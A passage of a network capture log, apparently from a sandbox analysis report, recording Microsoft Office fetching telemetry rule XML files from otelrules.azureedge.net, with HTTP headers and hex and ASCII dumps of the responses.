                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044824Z-16849878b78c5zx4gw8tcga1b400000005n0000000008bfc
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:24 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                  Session IDSource IPSource PortDestination IPDestination Port
                  131192.168.2.44987913.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:24 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:24 UTC563INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:24 GMT
                  Content-Type: text/xml
                  Content-Length: 1378
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                  ETag: "0x8DC582BDB813B3F"
                  x-ms-request-id: f93e38eb-401e-0015-221b-240e8d000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044824Z-15b8d89586fhl2qtatrz3vfkf000000002t000000000gtcd
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:24 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  132192.168.2.44988013.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:24 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:25 UTC563INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:25 GMT
                  Content-Type: text/xml
                  Content-Length: 1405
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                  ETag: "0x8DC582BE89A8F82"
                  x-ms-request-id: 63ec283c-e01e-0033-6817-244695000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044825Z-r197bdfb6b4k6h5j1g5mvtmsmn0000000a2g00000000ccs6
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:25 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                  Session IDSource IPSource PortDestination IPDestination Port
                  133192.168.2.44988213.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:25 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:25 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:25 GMT
                  Content-Type: text/xml
                  Content-Length: 1415
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                  ETag: "0x8DC582BDCE9703A"
                  x-ms-request-id: e081a540-501e-0035-2133-22c923000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044825Z-16849878b782558xg5kpzay6es00000005rg000000004u1q
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:25 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                  Session IDSource IPSource PortDestination IPDestination Port
                  134192.168.2.44988313.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:25 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:25 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:25 GMT
                  Content-Type: text/xml
                  Content-Length: 1378
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                  ETag: "0x8DC582BE584C214"
                  x-ms-request-id: 8bb74e69-501e-005b-14f3-24d7f7000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044825Z-r197bdfb6b4kq4j5t834fh90qn00000008sg000000003qcd
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:25 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  135192.168.2.44988113.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:25 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:25 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:25 GMT
                  Content-Type: text/xml
                  Content-Length: 1368
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                  ETag: "0x8DC582BE51CE7B3"
                  x-ms-request-id: 3d4cb055-601e-0097-01e5-21f33a000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044825Z-16849878b786vsxz21496wc2qn00000005vg000000005sve
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:25 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                  Session IDSource IPSource PortDestination IPDestination Port
                  136192.168.2.44988413.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:25 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:25 UTC563INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:25 GMT
                  Content-Type: text/xml
                  Content-Length: 1407
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                  ETag: "0x8DC582BE687B46A"
                  x-ms-request-id: 03ef3c5b-d01e-007a-4ff2-24f38c000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044825Z-15b8d89586fcvr6p5956n5d0rc00000002w000000000097d
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:25 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                  Session IDSource IPSource PortDestination IPDestination Port
                  137192.168.2.44988513.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:25 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:25 UTC563INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:25 GMT
                  Content-Type: text/xml
                  Content-Length: 1370
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                  ETag: "0x8DC582BDE62E0AB"
                  x-ms-request-id: b3872a13-301e-0020-3ef3-246299000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044825Z-r197bdfb6b4lbgfqheuaxfm7xn0000000f2g00000000k306
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:25 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                  Session IDSource IPSource PortDestination IPDestination Port
                  138192.168.2.44988713.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:26 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:26 UTC563INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:26 GMT
                  Content-Type: text/xml
                  Content-Length: 1360
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                  ETag: "0x8DC582BEDC8193E"
                  x-ms-request-id: 88a9635a-401e-005b-7585-219c0c000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044826Z-16849878b78c2tmb7nhatnd68s00000005n000000000qzd6
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:26 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                  Session IDSource IPSource PortDestination IPDestination Port
                  139192.168.2.44988813.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:26 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:26 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:26 GMT
                  Content-Type: text/xml
                  Content-Length: 1406
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                  ETag: "0x8DC582BEB16F27E"
                  x-ms-request-id: 4b1eeebb-201e-0051-0fab-217340000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044826Z-16849878b78c5zx4gw8tcga1b400000005m000000000b6pg
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:26 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                  Session IDSource IPSource PortDestination IPDestination Port
                  140192.168.2.44988613.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:26 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:26 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:26 GMT
                  Content-Type: text/xml
                  Content-Length: 1397
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                  ETag: "0x8DC582BE156D2EE"
                  x-ms-request-id: b7fa3ccf-501e-005b-325d-23d7f7000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044826Z-r197bdfb6b4lkrtc7na2dkay2800000000zg00000000q2wp
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:26 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                  Session IDSource IPSource PortDestination IPDestination Port
                  141192.168.2.44988913.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:26 UTC192OUTGET /rules/rule703000v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:26 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:26 GMT
                  Content-Type: text/xml
                  Content-Length: 1369
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                  ETag: "0x8DC582BE32FE1A2"
                  x-ms-request-id: ba3ed362-301e-0099-2f30-216683000000
